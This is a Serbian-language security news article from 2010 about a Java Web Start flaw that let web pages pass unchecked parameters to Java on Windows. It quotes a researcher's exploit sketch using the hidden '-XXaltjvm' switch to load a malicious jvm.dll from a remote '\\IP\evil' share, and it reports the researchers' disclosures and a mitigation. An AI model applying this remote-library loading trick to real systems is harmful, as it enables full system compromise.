Ozbiljan propust u novoj verziji Java pogađa sve aktuelne verzije Windows-a

Vesti, 12.04.2010, 01:37 AM

Postoji ranjivost u Java koja predstavlja ozbiljan problem jer ostavlja korisnike svih aktuelnih verzija Windows-a otvorenim za napade koji mogu dovesti do potpunog kompromitovanja pogođenog sistema. Dva istraživača su nezavisno jedan od drugog u petak objavili informacije o ranjivosti, tvrdeći da je ova ranjivost prisutna u okviru Java godinama unazad.

Problem leži u Java Web Strat framework, tehnologiji koju je razvio Sun Microsystems kako bi se omogućila jednostavnija primena Java aplikacija. U suštini, JavaWS tehnologija ne proverava parametre koje dobija od komandne linije, pa napadači mogu kontolisati ove parametre korišćenjem posebnih HTML oznaka na web strani, rekao je Ruben Santamarta u svom članku objavljenom u petak.

Tavis Ormandy je istog dana objavio svoj tekst o ovom nedostatku u Full Disclosure mailing list-u. Ormandy smatra da deaktiviranje Java dodatka nije dovoljno za prevenciju eventualnog iskorišćavanja ovog propusta, zbog toga što je ranjivi deo zasebno instaliran.

Ukratko, ukoliko imate poslednju verziju Java na svom kompjuteru, možete se smatrati pogođenim ovim propustom.

„Java.exe i javaw.exe podržavaju nepisani sakriveni parametar komandne linije „-XXaltjvm" i "-J-XXaltjvm" (videti -J switch u javaws.exe). Ovo upućuje Java da učita alternativnu JavaVM biblioteku (jvm.dll ili libjvm.so) sa željene putanje (path). Igra je završena. Možemo setovati -Xxaltjvm=\\IP\evil, na ovaj način javaw.exe će učitati naš loš jvm.dll. Bye, bye ASLR, DEP...“, piše Santamarta.

S obzirom da JavaWS tehnologija uključuje Java Runtime okruženje, koje se koristi u većini browser-a, ranjivost pogađa sve ove programe, uključujući Firefox, Internet Explorer i Chrome, na svim verzijama Windows-a, počev od Windows 2000 do Windows 7, tvrdi Santamarta. Browseri koji rade na Apple-ovom Mac OS X nisu ovim pogođeni.

U svom članku Ormandy kaže da je obavestio Sun o ovoj ranjivosti ali da proizvođač nije poverovao da je problem dovoljno ozbiljan i da zahteva urgentnu zakrpu.

„Programske alatke omogućavaju samo minimum provere URL parametara, dopuštajući nam dodavanje proizvoljnih parametara javaws programu, što obezbeđuje dovoljnu funkcionalnost preko komandne linije dozvoljavajući ovoj grešci da bude iskorišćena. Lakoća sa kojom ova greška može biti otkrivena uverila me je da je objavljivanje ovog dokumenta u najboljem interesu svih nas osim proizvođača,” kaže dalje u svom članku Ormandy.

Ovaj problem se može izbeći deaktiviranjem JavaWS i Java.exe, kaže Santamarta u svom postu.

Julien Tinnes daje dodatne informacije o ovoj vrsti Java ranjivosti.

Izvor: http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-browsers-040910


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Korisnici iPhonea mete napada upitima za resetovanje lozinke

Korisnici iPhonea mete napada upitima za resetovanje lozinke

Sofisticirana phishing kampanja koja cilja korisnike iPhonea poslednjih meseci ukazala je na slabost u Appleovom mehanizmu za resetovanje lozinke. Pre... Dalje

Mobi Banka upozorava na pokušaje prevare na društvenim mrežama

Mobi Banka upozorava na pokušaje prevare na društvenim mrežama

Mobi Banka je upozorila korisnike da su se na društvenim mrežama pojavili lažni profili koji koriste ime i logo Mobi Banke i pozivaju korisnike da,... Dalje

Googleova AI pretraga preporučuje korisnicima opasne sajtove i prevare

Googleova AI pretraga preporučuje korisnicima opasne sajtove i prevare

Ranije ovog meseca, Google je počeo da uvodi novu funkciju pod nazivom Google Search Generative Experience (SGE) u rezultate pretrage, koja pruža br... Dalje

Lažne ponude popularnog leka Ozempic preplavile internet, stručnjaci upozoravaju na fišing prevare

Lažne ponude popularnog leka Ozempic preplavile internet, stručnjaci upozoravaju na fišing prevare

Stručnjaci kompanije Kaspersky upozorili su na alarmantan trend pojave fišing stranica koje se predstavljaju kao sajtovi legitimnih prodavaca koji n... Dalje

Uvedene sankcije protiv tri berze kriptovaluta zbog pomoći Rusiji

Uvedene sankcije protiv tri berze kriptovaluta zbog pomoći Rusiji

Kancelarija za kontrolu strane imovine američkog Ministarstva finansija (OFAC) sankcionisala je tri berze kriptovaluta zbog nuđenja usluga koje se k... Dalje